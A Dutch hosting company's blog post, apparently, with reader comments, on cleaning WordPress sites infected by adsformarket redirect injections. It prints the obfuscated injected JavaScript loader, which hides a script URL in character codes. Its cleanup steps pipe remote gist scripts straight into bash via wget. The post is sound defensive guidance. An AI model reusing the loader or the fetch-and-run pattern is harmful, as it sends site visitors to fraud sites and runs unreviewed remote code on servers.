WordPress massaal geïnfecteerd met adsformarket redirects. Zo ruim je het op!

Er gaat een kwaadaardig JavaScript van adsformarket rond. Hierdoor wordt malafide code in WordPress geïnjecteerd, waarmee URL-redirects naar frauduleuze websites worden ingesteld. Ben je erdoor getroffen, dan wil je natuurlijk graag weten hoe je het oplost. Volg het stappenplan in dit artikel om je WordPress-website op te schonen!

Fix adsformarket URL redirect

Wat is er aan de hand?

We volgen nieuws omtrent beveiligingslekken in software altijd op de voet. Zo kwamen we op de hoogte van duizenden WordPress-websites die met een kwaadaardig JavaScript geïnfecteerde zijn geraakt. De afgelopen week nam het aantal infecties verder toe, waarbij hackers van kwetsbaarheden in een tal van plugins misbruik maken. Het gaat bijvoorbeeld om Simple Fields, InfiniteWP Client en waarschijnlijk ook andere.

Tip!
Om te controleren of je pakket met adsformarket geïnfecteerd is, kun je de SiteCheck van Sucuri doen of via SSH dit commando uitvoeren: grep -liR 'adsformarket' $WP_PATH.

Inmiddels berichten enkele grote securitywebsites over het probleem, zoals Infosecurity en Sucuri. Het malafide script zorgt ervoor dat er ongewenst redirects worden ingesteld naar een reeks frauduleuze domeinnamen, zoals gotosecond2 [.] com, adsformarket [.] com, admarketlocation [.] com en admarketresearch [.] xyz. Bezoek deze websites niet!

Hoe kan WordPress geïnfecteerd raken?

Hackers kunnen dankzij kwetsbaarheden in WordPress zichzelf ongewenst toegang verschaffen tot (delen) van jouw website. Eenmaal binnen, maken ze misbruik van het gevonden beveiligingslek door een een stukje code te injecteren. Hiermee roepen ze vervolgens een script aan dat een reeks doorverwijzingen (redirects) start naar onbetrouwbare websites. Hierop wordt geadverteerd met het invullen van (nep)enquêtes in ruil voor zogenaamde geschenken. Bezoekers van deze websites worden misleid om persoonlijke informatie over te dragen en ongewild malware te installeren.

Kwaadaardig script adformarket verwijderen uit WordPress

Momenteel zijn er nog geen beveiligingsupdates voor de lekken in WordPress en de kwetsbare plugins uitgerold. Eén van onze medewerkers heeft daarom een oplossing (cleanup adsformarket WordPress) ontwikkeld om je van deze vervelende rotzooi te verlossen. Mocht je WordPress-website (of één van je plugins) door dit kwaadwillende JavaScript geïnfecteerd zijn, dan kun je dat oplossen door onderstaande stappen te volgen.

Stap 1: backup maken en via SSH inloggen

Maak eerst een backup van je huidige website, alvorens je aan de gang gaat. Mocht er bij het opschonen namelijk iets niet goed gaan, dan kun je terugkeren naar de beginsituatie om het vervolgens opnieuw te proberen. Als de backup is gemaakt, log je via SSH in op je webhostingpakket. Eenmaal ingelogd ga je naar de map waar je WordPress-installatie in staat:

cd domains/jouwdomeinnaam.nl/public_html

Stap 2: injecties opschonen

De volgende stap is het opschonen van de snippet.adsformarket.com-injecties. De specifieke geïnjecteerde scriptregel ziet er zo uit:

Script adsformarket

Nu moet je binnen je hostingpakket zoeken in welke bestanden van je website ‘snippet.adsformarket.com’ wordt vermeld. Deze specifieke scriptregel vinden en verwijderen, gaat met het onderstaande commando:

wget -O - https://gist.github.com/hiranthi/7f95166b7fa7bf2e1ac0f3f1ab7e1c30/raw/60b7f884bf6b9eb3867909f320b416fcd6d2af47/cleanup-adsformarket.bash | bash

Om niet een enorme lijst met bestanden in de terminal weer te geven, worden de gevonden files naar twee tekstbestanden weggeschreven. Deze bestanden worden een niveau onder de public_html geplaatst en heten adsformarket.txt en track.adsformarket.txt. Daar zie je welke bestanden zijn opgeschoond.

Stap 3: JavaScript opschonen

In veel andere bestanden wordt een groter blok JavaScript toegevoegd. Dat blok ziet er zo uit:

var gfjfgjk = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,110,105,112,112,101,116,46,97,100,115,102,111,114,109,97,114,107,101,116,46,99,111,109,47,115,97,109,
101,46,106,115,63,118,61,51); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {  
d.getElementsByTagName('head')[0].appendChild(s);
}

Om dit blok op te schonen, gaan we op zoek naar vermeldingen van ‘gfjfgjk’. We verwijderen bij de betreffende bestanden de eerste bytes (waarvan het aantal overeenkomt met het aantal bytes van het te verwijderen blok). Dat kan met dit commando:

wget -O - https://gist.github.com/hiranthi/7f95166b7fa7bf2e1ac0f3f1ab7e1c30/raw/60b7f884bf6b9eb3867909f320b416fcd6d2af47/cleanup-gfjfgjk.bash | bash

De aangepaste bestanden kunnen (op hetzelfde niveau als het tekstbestand adsformarket.txt) gevonden worden in het bestand gfjfgjk.txt. Zo weet je ook hier wat er gevonden en opgeschoond is.

Stap 4: home en siteurl corrigeren

In sommige gevallen wordt de home of siteurl van de website in de database aangepast naar een URL van adsformarket. Dit los je op door deze naar je eigen domeinnaam te zetten via phpMyAdmin of met behulp van WP-CLI:

$wp option set home 'https://debetreffendedomeinnaam.nl' --skip-plugins --skip-themes --path=$WP_PATH

$wp option set siteurl 'https://debetreffendedomeinnaam.nl' --skip-plugins --skip-themes --path=$WP_PATH

Stap 5: ongewenste redirects opsporen

Vervolgens zoek je op je webhostingpakket naar andere ongewenste redirects en vermeldingen van ‘adsformarket’. Dat kan met dit commando:

grep -liR 'adsformarket' $WP_PATH

Stap 6: WordPress updaten

Het is nu belangrijk dat je WordPress, plugins en thema’s bijwerkt naar de actuele versies. Daarna dien je jouw WordPress-website te laten scannen door een plugin als Wordfence. Ook kun je de Sucuri SiteCheck gebruiken om een extra scan uit te voeren die op kwaadaardige infecties controleert.

Let op!
Met deze stappen verwijder je alleen de specifiek genoemde injecties. Het blijft belangrijk de gehele installatie grondig na te lopen en bij te werken.

Tot slot

We houden onze webhosting continue in de gaten en voeren regelmatig updates uit om misbruik te voorkomen. Ook draaien we Patchman, waarmee we vroegtijdig beveiligingslekken kunnen detecteren en repareren. Zo blijft onze infrastructuur snel, veilig en stabiel. Echter, over de inhoud van jouw website hebben wij geen controle. Het is en blijft daarom van belang dat ook jij actief je website up-to-date houdt. Voorkomen is beter dan genezen!

We blijven ontwikkelingen omtrent dit kwaadaardige JavaScript nauwlettend volgen. Zonodig treffen we opnieuw maatregelen. Ben je erdoor getroffen, dan hopen we in ieder geval dat deze stappen je hebben geholpen. Als je daarover vragen hebt, dan kun je uiteraard met onze Support contact opnemen. We helpen je graag verder!

P.S. Op de hoogte blijven van alle artikelen, updates, tips en trucs die op ons blog verschijnen? Volg ons via Facebook, Twitter, Instagram, RSS en e-mail!

Deel Deel Deel Deel

10 reacties op “WordPress massaal geïnfecteerd met adsformarket redirects. Zo ruim je het op!

    • Hi Sander,

      Voor zover we nu weten, nog niet. We hopen natuurlijk dat ze dit zo snel mogelijk gaan oppakken, zodat iedereen automatisch beschermd wordt.

  1. Lize Lorent op zei:

    Hoe weet je of je website geïnfecteerd is? Kunnen jullie de bovenstaande stappen in onze plaats uitvoeren? Ik heb het bekeken maar begrijp er niet veel van…

  2. Bedankt voor het delen van deze belangrijke informatie en de oplossing.

    Klopt het dat de gratis Wordfence plugin hier bescherming tegen biedt?

  3. Irma Lommen-Salden op zei:

    Begrijp niet veel van jullie oplossing helaas. Is er ook een mogelijkheid om te controleren of je site überhaupt ‘besmet’ is?
    Kan enige hulp bij dit alles zeer waarderen!
    Dank!

    • Hi Irma,

      Waarschijnlijk merk je het wel als je site besmet is, daar deze dan bezoekers doorstuurt naar frauduleuze websites. Het kan natuurlijk nooit kwaad om je site te controleren. Dat kan via SSH met het commando: grep -liR ‘adsformarket’ $WP_PATH. Echter, als je wat minder technisch onderlegd bent, dan kun je de SiteCheck van Sucuri doen: https://sitecheck.sucuri.net/ en dan bij het kopje ‘Website Malware & Security’ de uitkomst checken.

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *